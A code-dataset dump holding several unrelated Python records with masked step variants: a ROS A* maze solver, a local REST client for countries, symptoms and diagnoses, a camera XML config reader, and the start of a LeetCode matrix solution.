candidate\n\t\t\tnorth = [current[0],current[1]-1]\n\t\t\tsouth = [current[0],current[1]+1]\n\t\t\teast = [current[0]+1,current[1]]\n\t\t\twest = [current[0]-1,current[1]]\n\n\t\t\t#print current\n\n\t\t\t# calculate the heuristic\n\t\t\tn_heuristic = math.sqrt(pow(north[0]-goal[0],2)+pow(north[1]-goal[1],2))\n\t\t\ts_heuristic = math.sqrt(pow(south[0]-goal[0],2)+pow(south[1]-goal[1],2))\n\t\t\te_heuristic = math.sqrt(pow(east[0]-goal[0],2)+pow(east[1]-goal[1],2))\n\t\t\tw_heuristic = math.sqrt(pow(west[0]-goal[0],2)+pow(west[1]-goal[1],2))\n\n\t\t\t# check the punishment of obstacle\n\t\t\tif MAP[north[1]-1,north[0]-1]==0: n_punish = 2000\n\t\t\telse: n_punish = 0\n\t\t\tif MAP[south[1]-1,south[0]-1]==0: s_punish = 2000\n\t\t\telse: s_punish = 0\n\t\t\tif MAP[east[1]-1,east[0]-1]==0: e_punish = 2000\n\t\t\telse: e_punish = 0\n\t\t\tif MAP[west[1]-1,west[0]-1]==0: w_punish = 2000\n\t\t\telse: w_punish = 0\n\n\t\t\t#print n_punish, s_punish, e_punish, w_punish\n\t\t\t# check last node never go back\n\t\t\tnum = path.shape[0] # get the path step number\n\t\t\tif num!=1:\n\t\t\t\tlast_step = path[-2]\n\t\t\t\tn_check = north - last_step\n\t\t\t\ts_check = south - last_step\n\t\t\t\te_check = east - last_step\n\t\t\t\tw_check = west - last_step\n\t\t\t\tif ( n_check[0]==0 and n_check[1]==0): n_punish = 2000\n\t\t\t\tif ( s_check[0]==0 and s_check[1]==0): s_punish = 2000\n\t\t\t\tif ( e_check[0]==0 and e_check[1]==0): e_punish = 2000\n\t\t\t\tif ( w_check[0]==0 and w_check[1]==0): w_punish = 2000\n\n\t\t\t# sum the cost together\n\t\t\tn_cost = int(n_heuristic + n_punish)\n\t\t\ts_cost = int(s_heuristic + s_punish)\n\t\t\te_cost = int(e_heuristic + e_punish)\n\t\t\tw_cost = int(w_heuristic + w_punish)\n\t\t\tcost = [n_cost, s_cost, e_cost, w_cost]\n\n\n\t\t\t# there will be some situations should be taken into consideration\n\t\t\tindex = np.argmin(cost) # where the smallest cost is located\n\t\t\tmincost = cost[index]\n\t\t\t# First only one direction cost is less than 1000, then just pick that\n\t\t\tif mincost<=1000: # there must be at least one solution\n\t\t\t\tsumcheck = cost[0]+cost[1]+cost[2]+cost[3]\n\t\t\t\tif sumcheck >= 6000: # only one next choice\n\t\t\t\t\tif index == 0: next = north\n\t\t\t\t\telif index == 1: next = south\n\t\t\t\t\telif index == 2: next = east\n\t\t\t\t\telif index == 3: next = west\n\t\t\t\t\t# update the path\n\t\t\t\t\tpath = np.append(path,[next],axis=0)\n\t\t\t\t\t# update the check for next while\n\t\t\t\t\tprecheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])\n\t\t\t\t\tif precheck == 0:\n\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t# updat the current\n\t\t\t\t\tcurrent = next\n\n\t\t\t\telif (sumcheck >= 4000 and sumcheck < 6000) : # two posible choices\n\t\t\t\t\tif index == 0: next = north\n\t\t\t\t\telif index == 1: next = south\n\t\t\t\t\telif index == 2: next = east\n\t\t\t\t\telif index == 3: next = west\n\t\t\t\t\t# update the path choose the one have the least cost\n\t\t\t\t\tpath = np.append(path,[next],axis=0)\n\t\t\t\t\t# update the check for next while\n\t\t\t\t\tprecheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])\n\t\t\t\t\tif precheck == 0:\n\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t# save the branch to the back up [current, branch]\n\t\t\t\t\tfakecost = cost\n\t\t\t\t\tfakecost[index] = 2000\t# mannually fake the minimum cost choice\n\t\t\t\t\tfakeindex = np.argmin(fakecost) # where the smallest cost is located\n\t\t\t\t\tif fakeindex == 0: branch = north\n\t\t\t\t\telif fakeindex == 1: branch = south\n\t\t\t\t\telif fakeindex == 2: branch = east\n\t\t\t\t\telif fakeindex == 3: branch = west\n\t\t\t\t\tbackup = np.append([[current[0],current[1],branch[0],branch[1]]], backup, axis=0)\n\t\t\t\t\t# updat the current\n\t\t\t\t\tcurrent = next\n\n\t\t\t\telif (sumcheck >= 2000 and sumcheck < 4000) : # three posible choices\n\t\t\t\t\tif index == 0: next = north\n\t\t\t\t\telif index == 1: next = south\n\t\t\t\t\telif index == 2: next = east\n\t\t\t\t\telif index == 3: next = west\n\t\t\t\t\t# update the path choose the one have the least cost\n\t\t\t\t\tpath = np.append(path,[next],axis=0)\n\t\t\t\t\t# update the check for next while\n\t\t\t\t\tprecheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])\n\t\t\t\t\tif precheck == 0:\n\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t# save the branch to the back up [current, branch]\n\t\t\t\t\t# second cost\n\t\t\t\t\tsecondcost = cost\n\t\t\t\t\tsecondcost[index] = 2000\t# mannually fake the minimum cost choice\n\t\t\t\t\tsecondindex = np.argmin(secondcost) # where the smallest cost is located\n\t\t\t\t\tif secondindex == 0: branch1 = north\n\t\t\t\t\telif secondindex == 1: branch1 = south\n\t\t\t\t\telif secondindex == 2: branch1 = east\n\t\t\t\t\telif secondindex == 3: branch1 = west\n\n\t\t\t\t\tthirdcost = secondcost\n\t\t\t\t\tthirdcost[secondindex] = 2000\t# mannually fake the minimum cost choice\n\t\t\t\t\tthirdindex = np.argmin(thirdcost) # where the smallest cost is located\n\t\t\t\t\tif thirdindex == 0: branch2 = north\n\t\t\t\t\telif thirdindex == 1: branch2 = south\n\t\t\t\t\telif thirdindex == 2: branch2 = east\n\t\t\t\t\telif thirdindex == 3: branch2 = west\n\t\t\t\t\t# update branch based on cost difference\n\t\t\t\t\tbackup = np.append([[current[0],current[1],branch2[0],branch2[1]]], backup, axis=0)\n\t\t\t\t\tbackup = np.append([[current[0],current[1],branch1[0],branch1[1]]], backup, axis=0)\n\t\t\t\t\t# updat the current\n\t\t\t\t\tcurrent = next\n\n\n\n\t\t\telif mincost>=2000: # there is no next choice we have go to backup branchs\n\t\t\t\t# next step is the first ranking branch\t\t\t\t\n\t\t\t\tnext = [backup[0,2],backup[0,3]]\n\t\t\t\t# cut the path back\n\t\t\t\tcurrent = [backup[0,0],backup[0,1]]\n\t\t\t\tcompare = abs(path-current)\n\t\t\t\tsummation = sum(np.transpose(compare))\n\t\t\t\tindex = np.argmin(summation)\n\t\t\t\t# cut the path from 0 to current one\n\t\t\t\tpath = path[:index+1]\n\t\t\t\t# update the path with next step\n\t\t\t\tpath = np.append(path,[next],axis=0)\n\t\t\t\t# delete the first backup\n\t\t\t\tbackup = backup[1:]\n\t\t\t\t# update the check for next while\n\t\t\t\tprecheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])\n\t\t\t\tif precheck == 0:\n\t\t\t\t\tcheck = 0\n\t\t\t\t# updat the current\n\t\t\t\tcurrent = next\n\t\t\n\t\t# A* algorithm is ended\n\n\t\tsteps = path.shape[0]\n\t\ti = 0\n\t\twhile i < steps-1:\n\t\t\tcv2.line(map_ref,(20*path[i,0]-10,20*path[i,1]-10),(20*path[i+1,0]-10,20*path[i+1,1]-10),(255,0,0),3)\n\t\t\ti = i+1\n\n\t\tcv2.imshow(\"Map Image\", map_ref)\n\n\t\tcv2.waitKey(1)\n\n\t\ttry:\n\t\t\tself.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, encoding=\"bgr8\"))\n\t\texcept CvBridgeError, e:\n\t\t\tprint e\n\ndef main(args):\n\tic = labyrinth_solver()\n\trospy.init_node('labyrinth_solver', anonymous=True)\n\ttry:\n\t\trospy.spin()\n\texcept KeyboardInterrupt:\n\t\tprint \"Shutting down\"\n\tcv2.destroyAllWindows()\n \nif __name__ == '__main__':\n\t\tmain(sys.argv)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import requests
import json
ROOT_URL = "http://localhost:5000"
def get_all_countries():
response = requests.get("{}/countries".format(ROOT_URL))
return response.json()["countries"]
def get_country_probability(countryIds):
body = {"countryIds": countryIds}
response = requests.get("{}/countries/probability".format(ROOT_URL), data=body)
return response.json()["probability"]
def add_country(country_name, country_code):
body = {"country_name": country_name, "country_code": country_code}
response = requests.post("{}/countries".format(ROOT_URL), data=body)
return response.json()
def update_country(id, country_name=None, country_code=None):
body = {"id": id}
if country_name != None:
body["country_name"] = country_name
if country_code != None:
body["country_code"] = country_code
response = requests.put("{}/countries".format(ROOT_URL), data=body)
return response.json()["updates"]
def delete_country(id):
body = {"id": id}
response = requests.delete("{}/countries".format(ROOT_URL), data=body)
return response.json()
def get_all_symptoms():
response = requests.get("{}/symptoms".format(ROOT_URL))
return response.json()["symptoms"]
def get_symptom_probability(symptomIds):
body = {"symptomIds": symptomIds}
response = requests.get("{}/symptoms/probability".format(ROOT_URL), data=body)
return response.json()["probability"]
def add_symptom(name):
body = {"name": name}
response = requests.post("{}/symptoms".format(ROOT_URL), data=body)
return response.json()
def update_symptom(id, name=None):
body = {"id": id}
if name != None:
body["name"] = name
response = requests.put("{}/symptoms".format(ROOT_URL), data=body)
return response.json()["updates"]
def delete_symptom(id):
body = {"id": id}
response = requests.delete("{}/symptoms".format(ROOT_URL), data=body)
return response.json()
def get_diagnosis(id):
id = str(id)
response = requests.get("{}/diagnoses?id={}".format(ROOT_URL, id))
return response.json()["diagnosis"]
def get_all_diagnoses():
response = requests.get("{}/diagnoses".format(ROOT_URL))
return response.json()["diagnoses"]
def add_diagnosis(name, temperature, result, countryIds, symptomIds):
body = {"name": name, "temperature": temperature, "result": result, "countryIds": countryIds, "symptomIds": symptomIds}
response = requests.post("{}/diagnoses".format(ROOT_URL), data=body)
return response.json()
def delete_diagnosis(id):
body = {"id": id}
response = requests.delete("{}/diagnoses".format(ROOT_URL), data=body)
return response.json()
if __name__ == '__main__':
pass
|
normal
|
{
"blob_id": "6aa7114db66a76cfa9659f5537b1056f40f47bd2",
"index": 3975,
"step-1": "<mask token>\n\n\ndef get_all_countries():\n response = requests.get('{}/countries'.format(ROOT_URL))\n return response.json()['countries']\n\n\ndef get_country_probability(countryIds):\n body = {'countryIds': countryIds}\n response = requests.get('{}/countries/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_country(country_name, country_code):\n body = {'country_name': country_name, 'country_code': country_code}\n response = requests.post('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_country(id, country_name=None, country_code=None):\n body = {'id': id}\n if country_name != None:\n body['country_name'] = country_name\n if country_code != None:\n body['country_code'] = country_code\n response = requests.put('{}/countries'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\n<mask token>\n\n\ndef get_all_symptoms():\n response = requests.get('{}/symptoms'.format(ROOT_URL))\n return response.json()['symptoms']\n\n\ndef get_symptom_probability(symptomIds):\n body = {'symptomIds': symptomIds}\n response = requests.get('{}/symptoms/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\n<mask token>\n\n\ndef update_symptom(id, name=None):\n body = {'id': id}\n if name != None:\n body['name'] = name\n response = requests.put('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_symptom(id):\n body = {'id': id}\n response = requests.delete('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_diagnosis(id):\n id = str(id)\n response = requests.get('{}/diagnoses?id={}'.format(ROOT_URL, id))\n return response.json()['diagnosis']\n\n\ndef get_all_diagnoses():\n response = requests.get('{}/diagnoses'.format(ROOT_URL))\n return response.json()['diagnoses']\n\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n body = {'name': name, 'temperature': temperature, 'result': result,\n 'countryIds': countryIds, 'symptomIds': symptomIds}\n response = requests.post('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_all_countries():\n response = requests.get('{}/countries'.format(ROOT_URL))\n return response.json()['countries']\n\n\ndef get_country_probability(countryIds):\n body = {'countryIds': countryIds}\n response = requests.get('{}/countries/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_country(country_name, country_code):\n body = {'country_name': country_name, 'country_code': country_code}\n response = requests.post('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_country(id, country_name=None, country_code=None):\n body = {'id': id}\n if country_name != None:\n body['country_name'] = country_name\n if country_code != None:\n body['country_code'] = country_code\n response = requests.put('{}/countries'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\n<mask token>\n\n\ndef get_all_symptoms():\n response = requests.get('{}/symptoms'.format(ROOT_URL))\n return response.json()['symptoms']\n\n\ndef get_symptom_probability(symptomIds):\n body = {'symptomIds': symptomIds}\n response = requests.get('{}/symptoms/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\n<mask token>\n\n\ndef update_symptom(id, name=None):\n body = {'id': id}\n if name != None:\n body['name'] = name\n response = requests.put('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_symptom(id):\n body = {'id': id}\n response = requests.delete('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_diagnosis(id):\n id = str(id)\n response = requests.get('{}/diagnoses?id={}'.format(ROOT_URL, id))\n return response.json()['diagnosis']\n\n\ndef get_all_diagnoses():\n response = requests.get('{}/diagnoses'.format(ROOT_URL))\n return response.json()['diagnoses']\n\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n body = {'name': name, 'temperature': temperature, 'result': result,\n 'countryIds': countryIds, 'symptomIds': symptomIds}\n response = requests.post('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef delete_diagnosis(id):\n body = {'id': id}\n response = requests.delete('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_all_countries():\n response = requests.get('{}/countries'.format(ROOT_URL))\n return response.json()['countries']\n\n\ndef get_country_probability(countryIds):\n body = {'countryIds': countryIds}\n response = requests.get('{}/countries/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_country(country_name, country_code):\n body = {'country_name': country_name, 'country_code': country_code}\n response = requests.post('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_country(id, country_name=None, country_code=None):\n body = {'id': id}\n if country_name != None:\n body['country_name'] = country_name\n if country_code != None:\n body['country_code'] = country_code\n response = requests.put('{}/countries'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_country(id):\n body = {'id': id}\n response = requests.delete('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_all_symptoms():\n response = requests.get('{}/symptoms'.format(ROOT_URL))\n return response.json()['symptoms']\n\n\ndef get_symptom_probability(symptomIds):\n body = {'symptomIds': symptomIds}\n response = requests.get('{}/symptoms/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_symptom(name):\n body = {'name': name}\n response = requests.post('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_symptom(id, name=None):\n body = {'id': id}\n if name != None:\n body['name'] = name\n response = requests.put('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_symptom(id):\n body = {'id': id}\n response = requests.delete('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_diagnosis(id):\n id = str(id)\n response = requests.get('{}/diagnoses?id={}'.format(ROOT_URL, id))\n return response.json()['diagnosis']\n\n\ndef get_all_diagnoses():\n response = requests.get('{}/diagnoses'.format(ROOT_URL))\n return response.json()['diagnoses']\n\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n body = {'name': name, 'temperature': temperature, 'result': result,\n 'countryIds': countryIds, 'symptomIds': symptomIds}\n response = requests.post('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef delete_diagnosis(id):\n body = {'id': id}\n response = requests.delete('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\nif __name__ == '__main__':\n pass\n",
"step-4": "import requests\nimport json\nROOT_URL = 'http://localhost:5000'\n\n\ndef get_all_countries():\n response = requests.get('{}/countries'.format(ROOT_URL))\n return response.json()['countries']\n\n\ndef get_country_probability(countryIds):\n body = {'countryIds': countryIds}\n response = requests.get('{}/countries/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_country(country_name, country_code):\n body = {'country_name': country_name, 'country_code': country_code}\n response = requests.post('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_country(id, country_name=None, country_code=None):\n body = {'id': id}\n if country_name != None:\n body['country_name'] = country_name\n if country_code != None:\n body['country_code'] = country_code\n response = requests.put('{}/countries'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_country(id):\n body = {'id': id}\n response = requests.delete('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_all_symptoms():\n response = requests.get('{}/symptoms'.format(ROOT_URL))\n return response.json()['symptoms']\n\n\ndef get_symptom_probability(symptomIds):\n body = {'symptomIds': symptomIds}\n response = requests.get('{}/symptoms/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_symptom(name):\n body = {'name': name}\n response = requests.post('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_symptom(id, name=None):\n body = {'id': id}\n if name != None:\n body['name'] = name\n response = requests.put('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_symptom(id):\n body = {'id': id}\n response = requests.delete('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_diagnosis(id):\n id = str(id)\n response = requests.get('{}/diagnoses?id={}'.format(ROOT_URL, id))\n return response.json()['diagnosis']\n\n\ndef get_all_diagnoses():\n response = requests.get('{}/diagnoses'.format(ROOT_URL))\n return response.json()['diagnoses']\n\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n body = {'name': name, 'temperature': temperature, 'result': result,\n 'countryIds': countryIds, 'symptomIds': symptomIds}\n response = requests.post('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef delete_diagnosis(id):\n body = {'id': id}\n response = requests.delete('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\nif __name__ == '__main__':\n pass\n",
"step-5": "import requests\nimport json\n\nROOT_URL = \"http://localhost:5000\"\n\ndef get_all_countries():\n\tresponse = requests.get(\"{}/countries\".format(ROOT_URL))\n\treturn response.json()[\"countries\"]\n\ndef get_country_probability(countryIds):\n\tbody = {\"countryIds\": countryIds}\n\tresponse = requests.get(\"{}/countries/probability\".format(ROOT_URL), data=body)\n\treturn response.json()[\"probability\"]\n\ndef add_country(country_name, country_code):\n\tbody = {\"country_name\": country_name, \"country_code\": country_code}\n\tresponse = requests.post(\"{}/countries\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef update_country(id, country_name=None, country_code=None):\n\tbody = {\"id\": id}\n\tif country_name != None:\n\t\tbody[\"country_name\"] = country_name\n\tif country_code != None:\n\t\tbody[\"country_code\"] = country_code\n\tresponse = requests.put(\"{}/countries\".format(ROOT_URL), data=body)\n\treturn response.json()[\"updates\"]\n\ndef delete_country(id):\n\tbody = {\"id\": id}\n\tresponse = requests.delete(\"{}/countries\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef get_all_symptoms():\n\tresponse = requests.get(\"{}/symptoms\".format(ROOT_URL))\n\treturn response.json()[\"symptoms\"]\n\ndef get_symptom_probability(symptomIds):\n\tbody = {\"symptomIds\": symptomIds}\n\tresponse = requests.get(\"{}/symptoms/probability\".format(ROOT_URL), data=body)\n\treturn response.json()[\"probability\"]\n\ndef add_symptom(name):\n\tbody = {\"name\": name}\n\tresponse = requests.post(\"{}/symptoms\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef update_symptom(id, name=None):\n\tbody = {\"id\": id}\n\tif name != None:\n\t\tbody[\"name\"] = name\n\n\tresponse = requests.put(\"{}/symptoms\".format(ROOT_URL), data=body)\n\treturn response.json()[\"updates\"]\n\ndef delete_symptom(id):\n\tbody = {\"id\": id}\n\tresponse = requests.delete(\"{}/symptoms\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef get_diagnosis(id):\n\tid = str(id)\n\tresponse = requests.get(\"{}/diagnoses?id={}\".format(ROOT_URL, id))\n\treturn response.json()[\"diagnosis\"]\n\ndef get_all_diagnoses():\n\tresponse = requests.get(\"{}/diagnoses\".format(ROOT_URL))\n\treturn response.json()[\"diagnoses\"]\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n\tbody = {\"name\": name, \"temperature\": temperature, \"result\": result, \"countryIds\": countryIds, \"symptomIds\": symptomIds}\n\tresponse = requests.post(\"{}/diagnoses\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef delete_diagnosis(id):\n\tbody = {\"id\": id}\n\tresponse = requests.delete(\"{}/diagnoses\".format(ROOT_URL), data=body)\n\treturn response.json()\n\nif __name__ == '__main__':\n\tpass\n",
"step-ids": [
11,
12,
15,
17,
18
]
}
|
[
11,
12,
15,
17,
18
] |
#!/usr/bin/env python2.7
'''
lib script to encapsulate the camera info
'''
from xml.dom import minidom, Node
# what % of the file system remains before deleting files
# amount that we will cleanup relative to the filesystem total
CAMERA_XML_FILE = "/tmp/cameras.xml"
def cameras_get_info():
'''
cameras_get_info - reads the camera info from the XML file and
puts it into a python data structure and returns it.
'''
status = 0
xmldoc = minidom.parse(CAMERA_XML_FILE)
itemlist = xmldoc.getElementsByTagName('camera')
# camera info to return
cameras_info = []
for i in xrange(len(itemlist)):
cameras_info.append({'id':itemlist[i].attributes['id'].value})
a=itemlist[i].getElementsByTagName('user')
cameras_info[i].update({'user':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('model')
cameras_info[i].update({'model':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('passwd')
cameras_info[i].update({'passwd':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('port')
cameras_info[i].update({'port':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('ip_address')
cameras_info[i].update({'ip_address':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('disk_location')
cameras_info[i].update({'disk_location':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('mfgr')
cameras_info[i].update({'mfgr':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('ftp_loc')
cameras_info[i].update({'ftp_loc':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('status')
cameras_info[i].update({'status':a[0].firstChild.data})
a=itemlist[i].getElementsByTagName('location')
cameras_info[i].update({'location':a[0].firstChild.data})
return status, cameras_info
|
normal
|
{
"blob_id": "510d411d79d5df8658703241f161b3e2a9ec5932",
"index": 4110,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef cameras_get_info():\n \"\"\"\n cameras_get_info - reads the camera info from the XML file and\n puts it into a python data structure and returns it.\n \"\"\"\n status = 0\n xmldoc = minidom.parse(CAMERA_XML_FILE)\n itemlist = xmldoc.getElementsByTagName('camera')\n cameras_info = []\n for i in xrange(len(itemlist)):\n cameras_info.append({'id': itemlist[i].attributes['id'].value})\n a = itemlist[i].getElementsByTagName('user')\n cameras_info[i].update({'user': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('model')\n cameras_info[i].update({'model': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('passwd')\n cameras_info[i].update({'passwd': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('port')\n cameras_info[i].update({'port': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ip_address')\n cameras_info[i].update({'ip_address': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('disk_location')\n cameras_info[i].update({'disk_location': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('mfgr')\n cameras_info[i].update({'mfgr': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ftp_loc')\n cameras_info[i].update({'ftp_loc': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('status')\n cameras_info[i].update({'status': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('location')\n cameras_info[i].update({'location': a[0].firstChild.data})\n return status, cameras_info\n",
"step-3": "<mask token>\nCAMERA_XML_FILE = '/tmp/cameras.xml'\n\n\ndef cameras_get_info():\n \"\"\"\n cameras_get_info - reads the camera info from the XML file and\n puts it into a python data structure and returns it.\n \"\"\"\n status = 0\n xmldoc = minidom.parse(CAMERA_XML_FILE)\n itemlist = xmldoc.getElementsByTagName('camera')\n cameras_info = []\n for i in xrange(len(itemlist)):\n cameras_info.append({'id': itemlist[i].attributes['id'].value})\n a = itemlist[i].getElementsByTagName('user')\n cameras_info[i].update({'user': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('model')\n cameras_info[i].update({'model': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('passwd')\n cameras_info[i].update({'passwd': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('port')\n cameras_info[i].update({'port': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ip_address')\n cameras_info[i].update({'ip_address': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('disk_location')\n cameras_info[i].update({'disk_location': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('mfgr')\n cameras_info[i].update({'mfgr': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ftp_loc')\n cameras_info[i].update({'ftp_loc': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('status')\n cameras_info[i].update({'status': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('location')\n cameras_info[i].update({'location': a[0].firstChild.data})\n return status, cameras_info\n",
"step-4": "<mask token>\nfrom xml.dom import minidom, Node\nCAMERA_XML_FILE = '/tmp/cameras.xml'\n\n\ndef cameras_get_info():\n \"\"\"\n cameras_get_info - reads the camera info from the XML file and\n puts it into a python data structure and returns it.\n \"\"\"\n status = 0\n xmldoc = minidom.parse(CAMERA_XML_FILE)\n itemlist = xmldoc.getElementsByTagName('camera')\n cameras_info = []\n for i in xrange(len(itemlist)):\n cameras_info.append({'id': itemlist[i].attributes['id'].value})\n a = itemlist[i].getElementsByTagName('user')\n cameras_info[i].update({'user': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('model')\n cameras_info[i].update({'model': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('passwd')\n cameras_info[i].update({'passwd': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('port')\n cameras_info[i].update({'port': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ip_address')\n cameras_info[i].update({'ip_address': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('disk_location')\n cameras_info[i].update({'disk_location': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('mfgr')\n cameras_info[i].update({'mfgr': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ftp_loc')\n cameras_info[i].update({'ftp_loc': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('status')\n cameras_info[i].update({'status': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('location')\n cameras_info[i].update({'location': a[0].firstChild.data})\n return status, cameras_info\n",
"step-5": "#!/usr/bin/env python2.7\n'''\n lib script to encapsulate the camera info\n'''\nfrom xml.dom import minidom, Node\n\n# what % of the file system remains before deleting files\n# amount that we will cleanup relative to the filesystem total\nCAMERA_XML_FILE = \"/tmp/cameras.xml\"\n\n\ndef cameras_get_info():\n '''\n cameras_get_info - reads the camera info from the XML file and\n puts it into a python data structure and returns it.\n '''\n status = 0\n xmldoc = minidom.parse(CAMERA_XML_FILE)\n itemlist = xmldoc.getElementsByTagName('camera')\n # camera info to return\n cameras_info = []\n for i in xrange(len(itemlist)):\n cameras_info.append({'id':itemlist[i].attributes['id'].value})\n a=itemlist[i].getElementsByTagName('user')\n cameras_info[i].update({'user':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('model')\n cameras_info[i].update({'model':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('passwd')\n cameras_info[i].update({'passwd':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('port')\n cameras_info[i].update({'port':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('ip_address')\n cameras_info[i].update({'ip_address':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('disk_location')\n cameras_info[i].update({'disk_location':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('mfgr')\n cameras_info[i].update({'mfgr':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('ftp_loc')\n cameras_info[i].update({'ftp_loc':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('status')\n cameras_info[i].update({'status':a[0].firstChild.data})\n a=itemlist[i].getElementsByTagName('location')\n cameras_info[i].update({'location':a[0].firstChild.data})\n return status, cameras_info\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
# @Time : 2018/6/11 下午6:45
# @Author : zhanzecheng
# @File : 542.01矩阵1.py
# @Software: PyCharm
"""
# 一个简单的循环方式来解决这个问题
# 这一题的思路不错,用多次循环来计数
# TODO: check 1
class Solution:
def updateMatrix(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
cur = 0
col = len(matrix[0])
row = len(matrix)
while True:
cur += 1
flag = False
for i in range(len(matrix)):
for j in range(len(matrix[0])):
if matrix[i][j] == cur:
